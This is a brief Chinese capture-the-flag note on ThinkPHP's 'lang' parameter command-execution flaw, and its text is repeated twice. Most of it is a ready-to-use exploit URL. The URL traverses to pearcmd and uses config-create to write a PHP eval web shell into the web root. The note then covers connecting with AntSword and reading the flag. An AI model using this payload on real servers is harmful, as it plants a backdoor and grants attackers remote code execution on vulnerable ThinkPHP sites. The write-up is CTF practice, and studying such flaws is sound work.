thinkphp lang 命令执行
使用网上的exp
/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php
要用bp抓包了使用,我猜应该是编码问题
蚁剑连接
查看flag
使用网上的exp
/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/<?=@eval($_POST['cmd']);?>+/var/www/html/shell.php
要用bp抓包了使用,我猜应该是编码问题
蚁剑连接
查看flag
浙公网安备 33010602011771号